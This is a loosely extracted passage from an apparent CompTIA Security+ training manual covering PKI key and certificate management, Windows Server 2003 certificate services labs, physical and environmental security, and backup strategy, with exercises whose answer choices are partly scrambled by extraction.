Once the key pair has been generated, the private key must be safely stored to protect it from being compromised, lost, or damaged. There are several key-storage methods, generally categorized as hardware or software storage. Hardware storage refers to storing the private key on a hardware storage medium, such as a smart card, memory stick, USB device, PCMCIA card, or other such device. These devices can be physically carried on the person, enforce encryption of the private key, and often provide the added benefit of on-board encryption and decryption processing. The main disadvantage to this method is that the storage medium is small and can be easily lost or stolen. Software storage refers to storing the private key in a computer file on the hard drive. The owner encrypts the private key by using a password or passphrase, and stores the encrypted key in a restricted file. The user can enable auditing to track access to this file. This method is not considered reliable, because if the file is restored to a different medium (such as a floppy disk or FAT drive), the encryption is removed. Certificate retrieval and validation As the name implies, certificate retrieval involves access to certificates for general signature verification and for encryption purposes. Retrieval is necessary as part of the normal encryption process for key management between the sender and the receiver. For verification, retrieval is used as a reference where the certificate containing the public key of a signed private key is retrieved and sent along with the signature or is made available on demand. Its imperative to have an easy and simple mechanism to retrieve certificates; otherwise, the complexity makes the system unusable. Validation is performed to ensure that a certificate is issued by a trusted CA in accordance with appropriate policy restrictions and to ascertain the certificates integrity and validity (whether its expired or has been revoked) before its actual usage. In most cases, all of this is achieved transparently by the client software before cryptographic operations using the certificate are carried out. Note: Attempts to use revoked certificates are a likely sign of attempted break-in. Key archive Key archiving is the storage of keys and certificates for an extended period of time. Its an essential element of business continuity and disaster recovery planning, and its the only solution that addresses lost keys and recovery of encrypted data. When used with additional services such as time stamping and notarization, a key-archive service meets audit requirements and handles the resolution of disputes. Key archiving is typically undertaken by an organizations CA, a trusted third party, or, in some cases, the end entity (although this is generally not reliable due to the complexities involved). All private keys (current, expired, and revoked), with the exception of keys used for non-repudiation, are backed up to a key-archival server. The server requires strong physical security and at least the same security as the keygenerating system.
1423
Certificate renewal is the process of issuing a new certificate with a new validity period. All thats required is that the certificate owner use the old key to sign a request for a new certificate. To facilitate smooth transition and prevent service interruption, the renewal should be initiated when a certificate approaches three-quarters of its intended lifetime (or 30 days before expiration). Many Certificate Authorities merely repackage the old public key with the new certificate. This is a bad practice because the longer you keep the same key pair, the more insecure it will become over time. Ideally, a new key should be generated with each renewal (also called a certificate update). Certificate revocation Certificate revocation implies the cancellation of a certificate before its natural expiration. Certificate owners and PKI administrators (with the approval of the certificate owner) can revoke a key for any number of reasons; for instance, a company changes ISP or moves to a new address, a contact leaves the company, or a private key is compromised or damaged. The cancellation process is much easier than properly publishing and maintaining the revocation information after the fact. There are several ways in which the notification is accomplished. The primary method is through certificate revocation lists (CRLs). Essentially, CRLs are data structures containing revoked certificates. To maintain integrity and authenticity, CRLs are signed. Other methods include CRL distribution points, certificate revocation trees (CRTs), and Redirect/Referral CRLs. Performance, timeliness, and scalability are some of the main factors that influence the revocation mechanisms. Instant-access methods through Online Certificate Status Protocols (OCSP) are also available. However, there is no guarantee that the real-time service is indeed providing an up-to-the-moment status. Its possible that the service might respond based on poorly updated databases. Additionally, many application implementations do not constantly check CRLs. There are also exceptions for which such notification is deemed unnecessary. Two such exceptions involve short certificate lifetimes and single-entity approvals. In the former case, the accepted revocation delay might be more than the certificate lifetime, so the certificate might not require revocation at all. In the latter case, as requests are always approved by a single entity, it might not be necessary to publish the revocation separately. The delay associated with the revocation requirement and subsequent notification is called revocation delay. Revocation delay must be clearly defined in the certificate policy because it determines how frequently or quickly the information is broadcast and used for verification. Certificate suspension If a certificate is not used for a period of time, the CA will eventually revoke it. To prevent this from taking place, a certificate owner will suspend the certificate, temporarily revoking it. Often this option is executed if an employee is on an extended leave of absence or a Web site is taken offline for renovations. The suspension is published in the CRL or OCSP with a status of Certification Hold. At the appropriate time, the suspension can be undone.
Administrative responsibilities
Setting up an enterprise PKI is an extremely complex task with enormous demands on financial, human, hardware, and software resources, in addition to the time factor. Its very important to understand the concepts, processes, and products involved, and to ask pertinent questions right at the beginning. In addition to basic support, training, and documentation issues, some of the areas that need to be explored in detail include, but are not limited to, the following: Support for standards, protocols, and third-party applications Issues related to cross-certification, interoperability, and trust models Multiple key pairs and key-pair uses Methods to PKI-enable applications and client-side software availability Impact on end user for key backup, key or certificate update, and nonrepudiation services Performance, scalability, and flexibility issues regarding distribution, retrieval, and revocation systems Physical access control to facilities The security awareness in the IT industry has grown considerably, and the business community is beginning to understand the seriousness of security implications and the benefits of PKI. With the growth in e-commerce, PKI deployments are expected to continue to grow significantly over the next couple of years, despite questions on standards, policies, products, legalities, return on investment, and the technology itself.
Cryptography Do it!
1425
C-1:
Exercises
1 What is the key life cycle?
The key life cycle describes the stages a key goes through during its life: generation, distribution, storage, backup, and destruction.
3 Match each phase of key management below with its definition: Certificate generation Certificate revocation Key archival Key pair generation Key storage Certificate renewal Certificate validation Key escrow Key recovery Registration
Certificate validation Certificate revocation Certificate renewal Key recovery
A browser requests signature verification of a certificate. A certificate is cancelled before its expiration date. A certificate is reissued with a new validity period. A key is retrieved from archive due to loss or damage of the original. Matching private and public keys are created. A private key is safely stored on a hardware or software medium. The CA binds the requestors identifying attributes to its public key. The key is stored for an extended period of time. The key is stored in an off-site repository for third-party access. The user approaches the CA with a specific request for a certificate.
Certificate generation
Registration
Cryptography Do it!
1427
D-1:
Heres how
1 Log on to your server as Administrator
4 Click Add/Remove
Windows Components
5 Check Certificate Services Click Yes 6 Click Next 7 Select Stand-alone root CA Click Next 8 Enter Course Root CA 9 Click Next 10 Change the Shared folder to
C:\CertConfig As the Common Name for the CA. If necessary. To accept the warning message.
If prompted.
Click OK
If you receive an error message that setup failed with an error, perform the following steps: Click OK and click Finish. Restart the Add/Remove Windows Components wizard and remove Certificate Services. Then, click Start and choose Administrative Tools, Internet Information Services (IIS) Manager. Select Web Service Extensions, select All Unknown ISAPI Extensions, click Allow and click Yes. Select All Unknown CGI Extensions, click Allow and click Yes. Close Internet Information Services (IIS) Manager and start this activity over beginning with step 4. To enable Active Server Pages.
14 Click Yes 15 Click Finish 16 Close all windows 17 Restart the computer
Cryptography
1429
Client certificate
Explanation Windows Server 2003, when running certificate services and IIS, allows Web-based certificate requests. You can specify the type of certificate that you want and then wait for approval from an administrator. If you were using an Enterprise CA, the approval process would be automatic. Because youre using a Stand-alone CA, however, the certificate is pending until approved, as shown in Exhibit 14-8. All of these steps can be performed by using a Web browser and the Certification Authority MMC snap-in.
D-2:
Heres how
1 Click Start, then right-click My
Computer
Right-click Users Choose New User 3 Enter CertUserX Enter Password1 Uncheck User must change
password at next logon In the User name field. As the password.
Cryptography 15 Click Submit Click Yes Click Yes 16 View the Certificate Pending page 17 Log off CertUserX 18 Log on as Administrator 19 Click Start Choose Administrative
Tools, Certification Authority To acknowledge the warning messages.
1431
If prompted by another warning message. It provides you with information about the pending certificate request.
20 Expand Course Root CA 21 Select Pending Requests 22 Right-click the certificate Choose All Tasks, Issue 23 Select Issued Certificates
To view the issued certificate.
24 Log off Administrator 25 Log on as CertUserX 26 Launch Internet Explorer 27 In the address box, enter
http://server-x/certsrv Replace server-x with the name of your server.
29 Click your certificate 30 Click Install this certificate Click Yes 31 Log off CertUserX
You will receive a message that the certificate was successfully installed.
Cryptography Do it!
1433
D-3:
Heres how
1 Log on as Administrator
2 Click Start Choose Administrative Tools, Certification Authority 3 Right-click the Course Root CA Choose All Tasks, Stop
Service To stop the CA service.
4 Once the service has stopped, right-click the Course Root CA Choose All Tasks, Start
Service To restart the CA service.
5 In Windows Explorer, create a folder named C:\CABackup 6 In the Certification Authority window, right-click Course
Root CA
boxes Enter the path C:\CABackup Click Next 9 Enter password in the Password field Confirm the password Click Next
Click OK 12 Click Next 13 Check all boxes Enter C:\CABackup as the folder from which to restore Click Next 14 Type password Click Next 15 Click Finish Click Yes 16 Restart the server
To restore everything.
Cryptography
1435
Personal certificates
Explanation There may be a time when you need to import or export your certificates. For instance, you may want to export a certificate for a backup or for use on another computer, or you may want to import a certificate for a restore or if it were sent to you by another user or computer. The file format used in this activity is Personal Information Exchange (PKCS#12). This file type enables the transfer of certificates and their keys from one computer to another.
D-4:
Heres how
1 Log on to your server as
CertUserX
2 Click Start Choose Run and enter mmc 3 Choose File, Add/Remove
Snap-in To open a blank mmc console.
4 Click Add 5 Select Certificates Click Add 6 Click Close 7 Click OK 8 Expand Certificates
Current User
9 Expand Personal 10 Select Certificates 11 View the certificate by doubleclicking the name
In the right pane. The screen will look similar to the one shown below.
Cryptography 12 Click OK 13 Right-click the certificate Choose All Tasks, Export Click Next 14 Select Yes, export the
private key To begin the Certificate Export Wizard. To close the window.
1437
16 Enter password in the Password and Confirm password fields Click Next 17 Click Browse Type CertUserX Click Save 18 Click Next 19 Click Finish 20 Click OK 21 Launch Windows Explorer
To acknowledge that the export was successful. To import a certificate. As the file name. Do not change the path for the file.
Certificate revocation
Explanation Certificates are used to provide a way to verify the identity of individuals on a network. However, certificates are not 100% effective, and they can be compromised at times. Because of this, you need the ability to revoke certificates. Revoking certificates is an easy process that allows you to specify a reason for the revocation, as shown in Exhibit 14-11.
Cryptography Do it!
1439
D-5:
Heres how
1 Log on as Administrator 2 Click Start Choose Administrative Tools, Certification
Authority
3 Expand Course Root CA 4 Select Issued Certificates 5 Right-click the CertUserX certificate Choose All Tasks, Revoke
Certificate
6 Select Key Compromise for the reason Click Yes 7 Select Revoked Certificates 8 Right-click Revoked
Certificates
Choose Properties 10 Activate the View CRLs tab 11 Close all windows
To verify that the certificate was revoked.
D-6:
2 Which of the following certificate file formats are supported by Windows Server 2003? (Choose all that apply.)
A B
PKCS #12 PKCS #7 DER Encoded Binary X.500 Base64 Encoded X.509
C D
3 The Certificate Authority service must be stopped to perform a backup using the Certificate Authority Backup Wizard. True or false?
False. Backups can be completed without stopping the service.
4 Which of the following items is not available for backup in a Stand-alone CA environment? A
B
Private key and CA certificate Configuration information Issued Certificate Log and pending certificate request queue All of the above
C D
Cryptography
1441
Topic B
Topic C
Topic D
Review questions
1 What is the name for data that cannot be read without any manipulation? A ASCII B Plaintext
C
Ciphertext
D Script 2 Modern cryptography uses ___________ to encrypt and decrypt data. A probabilities B approximations C ratios
D
algorithms
B variable-length output string C optional output string D plaintext output string 4 Symmetric algorithms use an encryption key that cannot be calculated from the decryption key. True or false?
False. Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key.
5 Stream algorithms are more efficient than block algorithms. True or false?
False. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits.
asymmetric
B symmetric C block D stream 7 PKI stands for what? A Private key intrusion B Public key inventory C Private key infrastructure
D
8 When PKI is used, its the role of the CA to issue certificates to users. True or false?
True
9 Of the following, which is a more threatening situation? A A user tries to use an expired certificate. B A user tries to access the system from home.
C
Cryptography
1443
10 A Web of Trust model relies primarily on ___________ to perpetuate trust of certificates. A users themselves B CAs
C
introducers
D managers 11 The certificate practice statement is a published policy that explains to all users how the CA is structured. True or false?
True
12 A digital certificate is a credential that allows a recipient to verify whether a public key belongs to its owner. True or false?
True
13 Which of the following is a reason to revoke a certificate? A The key was lost. B The key is known to someone else. C The key has been compromised.
D
14 Which of the following is the most widely used standard for digital certificates? A X.400 B X.500 C X.25
D
X.509
15 You can safely distribute your public key to others. True or false?
True
56
C 128 D 168
151
materials, power supply, and fire suppression technologies in maintaining a secure environment.
152
Physical controls
Explanation Physical security is subject to a different set of threats than are previously discussed aspects of security. Physical security schemes protect not only mission-critical data, but also people, equipment, and the building itself. Many organizations employ various forms of physical security, ranging from security guards and identification badges to closed-circuit television cameras and biometric identifiers. If any of these systems fail, a breach of security can happen, and a compromise of mission-critical data can follow. When youre managing a network environment, its critical to secure all equipment, data, power supplies, wiring, and personnel with access to the location. As with all security, the amount and type of physical security in place should vary with the importance of the data being protected. A financial services company with customersensitive information on its servers is more likely to take drastic steps in its physical security plan than is a simple family-owned business. To best address security, you can use various physical deterrents, including locks, surveillance, fencing, and lighting.
Physical barriers
Perhaps the cheapest and most common way to secure physical access to a facility is to use locks. Locks deter casual intruders from trying to gain access, and locks slow down attempts by more serious security threats. An organization cannot rely completely on a lock-and-key mechanism for protection, however. Locks can be opened by anyone with a key, and if there are no other control mechanisms in place, that person can walk out unnoticed with mission-critical equipment. Various forms of locks can be used as part of an effective physical security plan; among them are preset locks, cipher locks, and device locks. Preset locks Preset locks are the typical locks that most of us are familiar with, such as key and knob combinations or rim locks with deadbolts, as shown in Exhibit 15-1. These locks are activated by using a metal key, and they are probably the least secure, because keys are easily lost or stolen and can be used by anyone to open the lock.
Physical security
153
Exhibit 15-1: Preset lock Cipher locks Cipher locks are programmable and use keypads to control access into a facility. Although they are considerably more expensive than preset locks, cipher locks offer more security and more flexibility for implementing a physical security plan. Cipherlock components are shown in Exhibit 15-2 and Exhibit 15-3.
154
CompTIA Security+ Certification Cipher locks come in many forms. Some take the form of keypad inputs that allow an authorized user to enter a password or personal identification number (PIN) to gain access. These systems are much more effective than standard lock-and-key security, yet an unauthorized user might be able to gain access by using an authorized users password or PIN. A potential attacker could very easily watch an employee or contractor enter their personal information into the keypad from afar, and use the codes to gain entry at a later date. A second form of cipher lock reads identification cards for access control. These identification cards usually have a photo of the employee or authorized user with his or her name and employee number. On the back of the card is a magnetic strip that contains the access information of that user. The card reader at the entrance can read this information and verify whether that person has access. If the card is a smart card, the system can ask for a password or PIN, which further enhances the security of the system. A slightly different card can be used with wireless proximity readers. Wireless proximity readers can sense the card when its within a certain distance of the reader. There are two types of proximity readers: user-activated and system-sensing. Useractivated proximity readers operate when the identification card transmits a sequence of values to the reader. System-sensing proximity readers can recognize the card within a specific area, and the readers do not require the user to perform any action to gain access. Cipher locks offer various options that make them a better choice than preset locks. These options include: Door delayIf a door is held or propped open for too long, it can trigger an alarm that causes security personnel to investigate. Key overrideA combination can be set into the lock for use in emergencies or for supervisory needs. Master key ringThis function allows supervisors to change access codes and other features as needed. Hostage alarmIf an employee is being forced to open a secured door or other secured entry point, he can enter a specific code that will notify security personnel and/or local law enforcement. Device locks Device locks are available to secure computer hardware and network devices. Without such locks, equipment can be easily moved or stolen. Cable locks are perhaps the best known of the device locks. They consist of a vinyl-coated steel cable that attaches PCs, laptops, and printers to desks, chairs, and other stationary objects. An example is shown in Exhibit 15-4. In addition to cable locks, other forms of device locks are available, such as switch controls that cover on/off switches, slot locks that cover spare expansion slots, port controls that block access to disk drives or serial ports, and cable traps that prevent the removal of cabling.
Physical security
155
Exhibit 15-4: Cable lock Multi-criteria locks Multi-criteria locks combine the strengths of two or more of the previously discussed lock types. A specific key or card may be required (something you have), along with a PIN number or password (something you know), and a thumbprint (something you are), to open the lock. As complexity increases, so does the cost and the security provided. The level of locking technology employed should be in proportion to the potential loss if someone were to breach that security. Surveillance Installing the various devices just discussed is only a partial answer to ensuring physical security. Another essential part is surveillance. Critical areas need to be watched to make sure that security policies are being followed and that unauthorized users are not trying to access the facility. Using security guards is one of the best ways to ensure physical security because guards are flexible, provide good response, and are an effective deterrent. Various intrusion detection systems and physical protection measures require human action. Guards can be placed permanently on post at vital entrances, or they can patrol the facilities to ensure that all is secure. Security guards should have a very well-defined process in place and should be fully trained on how to respond in an emergency. By combining the security mechanisms previously mentioned with security guards, an organization can optimize its physical security. Guard dogs are very effective at detecting intruders because dogs have such highly refined senses of smell and hearing. Guard dogs are also very effective deterrents just because a dogs barking will usually chase someone away. One of the challenges with using guard dogs is training them to distinguish between authorized and unauthorized users. In smaller organizations this is less of a challenge than in larger organizations with hundreds or more employees. Most of the time, guard dogs are used in tandem with security guards to present a threat to potential attackers. Physical surveillance, such as that provided by guards and guard dogs, is further enhanced by the use of visual recording devices. Closed-circuit television cameras can be placed throughout a facility and can be monitored at a central location. These cameras record all activity that takes place within critical areas and allow security personnel to assess whether or not an area is being compromised.
156
CompTIA Security+ Certification Fencing Fencing can prove to be a very effective physical barrier because it can control access to entrances. Of course, the cost of fencing is directly related to the height used, the quality of the material used, and the quality of the fence installation. Therefore, a cost-benefit analysis is necessary when youre deciding on the type of fence to be used. Fences three to four feet high are used primarily to deter casual trespassers, while fences eight feet high with barbed or razor wire indicate that the facility is serious about securing the physical perimeter. Lighting Lighting can be used to deter intruders while providing a safer environment for personnel. The National Institute of Standards and Technology advises that critical areas should be illuminated eight feet high and two feet out to ensure the safety of personnel and visitors. The actual lighting types can vary and may include flood lights, street lights, and lights that are easily focused.
157
A-1:
Exercises
1 Programmable locks that use a keypad for entering a personal identification number or password are called: A B
C
2 Locks that prevent the removal of computer hardware and network devices are called: A B C
D
Three feet out and eight feet high Two feet out and eight feet high Three feet out and six feet high Two feet out and six feet high
C D
4 Surveillance includes security guards, guard dogs, and visual recording devices. List one pro and one con for each. Security guards
Pro: Flexible, provide good response, effective deterrent Con: Expensive, require training
Guard dogs
Pro: Effective at detecting intruders, good deterrent Con: Difficult to train to be able to distinguish between authorized and unauthorized users
Security cameras
Pro: Can be distributed throughout facility and monitored at a central location Con: Limited field of vision, can be disabled with power outage
158
Biometrics
Explanation Biometric locks are based on the substance of the person attempting to gain entrance. Thumbprints, handprints, retinal scans, and voice prints are among the many biometric criteria that can be used to positively identify a person. Biometrics verifies a users identity by a unique personal characteristic. Because biometrics is such a sophisticated technology, the cost of implementing a biometrics system can be quite expensive. Biometric systems work by scanning the personal characteristic of a user and comparing that to a previous record that was created when the user was hired or added to the system. There are many types of biometrics systems that examine different attributes. With each type, a user must enroll with the organizations security department and have his or her physical characteristic scanned, registered, and verified. Following are some of the various biometrics systems that can be used to identify a person: Fingerprints Palm prints Hand geometry Eye scans Signature dynamics Voice prints Fingerprints and palm prints have long been recognized as valuable identification mechanisms. Every individuals finger or palm print is a unique pattern of ridges and swirls that identify that person. As a user places his or her finger or palm on an optical scanner, the finger or palm is scanned and compared to an archival file of fingerprints or palm prints. If there is a match, that person is granted access to the facility. Hand geometry scanners are fairly similar to fingerprint and palm scanners in that they scan the hand of a user. In this instance, instead of looking for ridges and swirls, the scanner measures the length and width of the hand and fingers. This mathematical process is then compared to archival data, and if a match occurs, the person is granted access. Since the 9/11 attack, airports have stepped up the implementation of this type of technology to increase security in selected airports. Long thought to be science fiction, eye scans have become a common type of biometric validation. Retina scans compare the patterns of blood vessels on the surface of the retina to the archival database, and iris scans use the variations in color, rings, and furrows of the iris to verify identity. Wells Fargo has experimented with the installation of iris scanners at ATMs to increase security. This technology will most likely become more prevalent as time goes on. Signature dynamics and voice prints provide other forms of biometric verification. The motions performed when writing a signature are unique to each individual, so this data can also be used for identification purposes. A voice print identifies an individual by the inflection, pitch, and intonation of his or her voice. With both technologies, this data is compared to the archive for verification. A downside to this method is that if a person loses his or her voice or cant speak, the person will be locked out. However, secondary verification can be used to counter this problem.
Physical security
159
Although biometric techniques theoretically positively identify an individual, they are known to have both false positives and false negatives. As new security technologies are developed based on biometrics, methods for fooling the systems quickly follow. Synthetic gel-filled structures called gummy fingers can fool fingerprint, palm print, or hand geometry readers. Signature forgery can be used on a signature reader just as on a printed check; however, signature dynamics assess more than just the final shape of the signature and are more difficult to fool. New technologies that are more difficult to fool are being developed. A promising method is based on DNA analysis, which can almost conclusively link a presented sample with a recorded sample. Unfortunately, that does not prevent a malicious person from obtaining genetic material from an authorized user and presenting it to the reader. Of course, obtaining such a sample is a difficult task in itself. Do it!
A-2:
Discussing biometrics
B C D
1511
A-3:
DDOS attack Social engineering attack Syn attack All of the above
C D
2 What is piggybacking?
This is a security breach in which an unauthorized person closely follows an authorized employee into a building.
Throw in the recycle bin. Use a shredder. Tear the document into pieces. Cross out private information and throw the document away.
C D
4 How should you securely dispose of electronic media that contain confidential information? (Choose all that apply.) A
B C D
Throw in the dumpster. Encrypt the media; then throw in the dumpster. Overwrite the contents with zeros if the media are erasable. Physically destroy the media .
Train employees on proper security practices. Install a biometric scanner at the entrance. Install a cipher lock at the entrance. Station a guard close to the entrance.
B C
D
Topic B: Environment
This topic covers the following CompTIA Security+ exam objective:
# 5.1 Objective Understand the application of the following concepts of physical security Environment Wireless Cells Location Shielding Fire Suppression
Environmental considerations
Explanation Environment refers to the surroundings in which the computers and other networking equipment reside. If the environment is not secure, data and equipment can be damaged or subjected to malicious attacks. The following factors should be considered: Building location and construction Ventilation Power supply Shielding Wireless cells Fire suppression
1513
Equally as important as location when choosing a site is the composition of the construction materials. Different materials yield different levels of protection from events such as storms, fires, and earthquakes. Whether wood, steel, or concrete is used in the construction of the building depends on what the building is going to be used for. A site used for daily operations has very different needs and legal requirements than does a site used for storage. When youre constructing or selecting a facility, its important to evaluate the fire rating and how well-reinforced the walls are. Another important consideration is the security of the doors: whether they are easily forced open; where they are located; whether they have glass; and whether the glass is shatterproof or bulletproof. Ceilings should be assessed for the combustibility of the material used, for load and weight bearing ratings, and for the ability to install drop ceilings for any necessary cabling. A facilitys windows should be translucent or opaque to deter any unwanted observation. They should also be shatterproof, if not bulletproof, and wired for alarms. It may even be prudent to have a facility with no windows, especially if the security policy dictates. When youre assessing a facility, its important to verify the location of shutoff valves for water and gas lines and the location of fire detection and suppression devices. Cable installation Physical security is impossible for many types of network facilities. For instance, wide area networks often employ fiber-optic cabling that may run hundreds or thousands of miles, and telephone cables are run on poles along the side of public streets. Although telephone cables are installed in a right-of-way, they are rarely protected by fences or other physical structures because of prohibitive cost. These cables may be buried under agricultural fields, and many major inadvertent disruptions have been caused by the unfortunate selection of a digging site with a backhoe. Because complete physical security is difficult in these environments, controlling organizations often implement physical security that limits the possibility of any externally caused accidental breaks and that provides immediate notification that a break has occurred or is about to occur. Running communications media along other structures, such as railroad tracks, may limit the potential for breaks. This was the common location for the original telegraph wires. In 1985, Williams Companies pioneered the placement of fiber-optic cables inside decommissioned pipeline structures that most backhoe operators try to avoid. Also, underground telephone trunks are sometimes bundled inside a sheath that is filled with compressed gas. The pressure is monitored at the central office; a substantial loss of pressure indicates that the outer protective coating has been breached. This monitoring often allows maintenance to be done on the trunk before any subscribers are aware of the difficulty.
Shielding
Common network cabling is very sensitive to electromagnetic interference (EMI) and radio frequency interference (RFI). Only properly shielded wires should be used in local area networks. Choose the best wiring that your budget permits and your environment requires. While high-quality UTP cabling does provide some protection, and coax cabling has even better resistance, fiber optics are totally immune to electrical interference.
Power failures
Power failures can be devastating to a network facility. If electricity services to a major data center or network operations center are disrupted, entire business operations units can be affected adversely. This makes efficient and effective power backups an absolute necessity. There are two main methods to protect against power failure: an uninterruptible power supply (UPS) and backup sources. An uninterruptible power supply uses batteries to maintain power until the primary power supply is restored. The capacity and size of these batteries varies from unit to unit. UPS units can operate on a standby basis or as online systems. Standby units stay inactive until a critical power event occurs. The system has sensors that can detect fluctuations and respond accordingly. Online systems use AC line voltage to charge a bank of batteries. When in use, the UPS changes the DC output from the batteries and regulates the voltage as it powers computing devices. The capacity and size of a UPS should be related to how critical the devices being powered are to the network. If they are vital networking pieces, the UPS should have considerable battery power to maintain critical networking function until power is restored. Just as important as a UPS are backup power sources. If a considerable outage occurs, a backup power source, such as a generator, may be needed. Again, the size and type of an appropriate generator depends on whats needed at the facility and should be directly correlated to just how important the equipment in the facility is. Telephone service is known to be extremely reliable, running after major disasters and during long-term power outages. Telephone companies employ multiple layers of power redundancy at the central office switch, which powers most of the connected telephones. A common implementation is for AC power from the local power-generating plant to be run through an inverter to create 48 volts of DC power, which is injected into large acidcell batteries. The batteries are connected to the switch, providing a clean source of energy that is shielded from the fluctuations of common AC power sources. The batteries are selected and maintained so that there is sufficient time to page an engineer, have that person arrive at the central office, determine that a power outage is due to loss of central power, and start up a large diesel generator. The generator replaces commercial power and can keep the batteries charged as long as the phone company can provide diesel fuel.
Physical security
1515
The following procedures can help protect computing facilities from various power issues: Use surge protectors to help protect equipment from voltage fluctuation. Follow proper shutdown and power-up procedures to ensure that computing devices are not damaged. Shield long cable runs to help control the impact of electromagnetic interference. Avoid fluorescent lighting. Properly ground all equipment and racks. Do not daisy-chain power strips and extension cords together to create longer extension cords. If a longer cord is needed, purchase one.
Fire suppression
Fires can seriously disrupt operations and cause large amounts of damage to facilities and should be considered a very serious threat. Its also possible that fire suppression materials may cause more damage than the fire that was extinguished, making suppression selection critical. There are national and local standards that must be met for facilities to operate. Fire detection response systems come in many forms. There are manual fire-alarm pulldown devices, as well as automatic sensors that react to smoke or heat or both. A fire detection response system is usually used with an automatic fire suppression system that uses Halon gas, carbon dioxide, water, or soda acid. The following table lists the major types of fire and the best way to suppress them.
Type of fire Class A: Common combustibles Class B: Flammable liquids Class C: Electrical Elements of fire Wood, paper, etc. Petroleum products and coolants Electrical equipment and wiring Suppression methods Pressurized water or soda acid. Halon (or replacement) gas, carbon dioxide, or soda acid. Nonconductive chemicals: Halon (or replacement) gas or carbon dioxide.
When wood or paper ignites, the primary cause for the fire is an increase in temperature. Water is used to put out these types of fires because it effectively lowers the temperature of the fire and then saturates the object to stop a flare-up from occurring. Carbon dioxide and soda acid smother the fire by removing oxygen, which is vital for fires to burn. Pouring water on a petroleum fire or electrical fire will not have much effect because the fire is not caused by heat. Using carbon dioxide or soda acid has an effect because they eliminate the oxygen fueling the fire. Halon gas has been used for fire suppression because it interferes with the chemical process that creates the fire. However, Halon has chemicals that deplete the ozone layer and that can be dangerous to humans in concentrations greater than 10%. For this reason, the use of Halon has been banned, and the Environmental Protection Agency has approved a list of replacements, including FM-200, NAF-S-III, Inergen, Argon, and Argonite.
Natural disasters
Another issue to keep in mind when considering the physical security of a facility is how prone the facility and surrounding areas are to natural disasters such as floods, lightning, or earthquakes. If the area is highly susceptible to such problems, it may make sense to locate the facility elsewhere. If the facility is already operational in such an area, safeguards such as flood drainage, lightning rods, and reinforced buildings should be evaluated. Do it!
B-1:
Discussing environment
1517
3 What type of a UPS system uses AC voltage to charge batteries and converts the DC output from the batteries to regulate voltage? A B C
D
4 What is an effective technique in ventilation systems that force air outward from a facility to help guard against dust and other pollutants? A B C
D
It eliminates oxygen. It reduces heat. It reduces the fuel intake of the fire. It disrupts a chemical reaction taking place.
Electrical fire Paper fire Trash can fire Open area fire
B C D
Topic B
Review questions
1 Which of the following items are not forms of physical protection? A Identification card B Biometric device
C
Access list
D Security guard 2 Which of the following are types of wireless proximity devices? A Biometric devices and access control devices B Swipe cards and passive devices C Preset code devices and wireless devices
D
3 What is a cipher lock? A A lock that uses cryptographic keys B A lock that uses a type of key that cannot be reproduced C A lock that uses a token and perimeter reader
D
After a door is opened for a specific period of time, the alarm goes off.
B The door can be opened only during an emergency. C The door has a hostage alarm capability. D The door has supervisory override capability.
Physical security 5 Technical controls are divided into which categories? A Personnel access controls B Surveillance C Ventilation D Power supply E Fire detection and suppression
F
1519
7 Standby is a type of UPS that stays active until a critical power event occurs. True or false?
False. Standby units stay inactive until a critical power event occurs.
8 A cable trap is a device that locks and prevents unauthorized unplugging of cables from computer devices. True or false?
True
9 Cipher locks are locks that secure computer hardware and network devices. True or false?
False. Cipher locks are programmable locks that use a keypad for entering a personal identification number or password.
10 The capacity and size of a UPS should be related to how critical the devices being powered are to the network. True or false?
True
11 Social engineering is a hackers manipulation of an authorized user (or users)and the natural human tendency to trustin order to get unauthorized access to a system. True or false?
True
12 Cipher locks offer which options that make them a better choice than preset locks? (Choose all that apply.)
A B C D E
Door delay Key override Master key ring Hostage alarm Master delay
13 Wireless Internet readers are magnetic card readers that can sense a card within a certain distance. True or false?
True
161
162
Backups
All computing hardware and media will fail. The issue is only one of timing. An essential part of any disaster recovery plan for any size organization is data backup. Backup of all mission-critical data is vital to allow personnel to restore files and application software and continue business. The method and schedule of data backups performed must be sufficient to restore those processes deemed critical. An effective backup strategy should take into account the following key issues:
163
What data should be backed up? Your company may separate its data into mission-critical information and data that does not change over time, such as operating system and application files. Full backups will back up all files selected on a system. A full backup will clear the archive bit of each file after every session. Incremental backups will save only those files that have been modified since the previous backup. The archive bit is cleared on those files that are backed up. This method is the fastest to back up but the slowest to restore, because you need to restore the last full backup and every incremental backup after that. Differential backups will save only those files that have been changed since the last full backup. The archive bit is not cleared on those files backed up, so each differential backup is larger than the previous. You need to restore only the last full backup and the most recent differential. How frequently should the backups be run? Backup schedules will take into account the importance and stability of the data. Data that is changed on a daily basis, such as a transactional database, will be backed up daily. Other files, such as program files, that dont change often, can be backed up on a lighter schedule, such as weekly. What is the backup medium? The amount of data to be backed up will affect the type of medium you choose. The most common type of backup media is magnetic tape. It can accommodate a large amount of data, offers relatively inexpensive storage, and is fast. Other media include optical disks, Zip disks, and removable hard drives. Are the backups manual or automated? Manual backups require an attendant to switch media once full or to respond to an error. If your backups are unattended, make sure that your mediums capacity is sufficient to store the entire contents of the backup. Jukebox devices, which use robotic autoloaders to switch tapes, resolve the issue of backing up multiple volumes of data. How are backups verified? Verification tests the data stored on the backup against the original data to ensure that the copy is an exact image of the original. Although verification prolongs the backup process by twofold, its the only way to ensure a good backup. In addition, you should regularly test the backup devices by performing test restores. How long are backups stored? Media rotation and retention determine the amount of time a backup should be retained before the media are reused or destroyed. Magnetic tapes deteriorate over time and suffer wear and tear with reuse. Develop a media rotation scheme that is consistent with your companys requirements, and adhere to it. Who is responsible for backups? Your backup plan should document who is responsible for performing the backup operators functions, including changing tapes, sending tapes offsite, performing restores, and examining log files. The plan should also identify the fallback person if the primary operator is unavailable. Where are backups stored? A copy of all data should be stored at a site separate from the location of the production network and systems to ensure that destruction of the facility does not compromise all data. When an organization has more than one main office, data should be duplicated and stored at more than one site to ensure business continuity.
164
CompTIA Security+ Certification Media rotation schemes Several rotation methods are available to provide the ideal balance between cost and reliability. The son method uses the same backup media on a daily basis. This method does not allow for archiving, and you are limited to your last backup for a restore. If the backup is damaged, there is no means to restore the data.
You may want to illustrate the rotation schemes for father-son and grandfather-fatherson methods on the board.
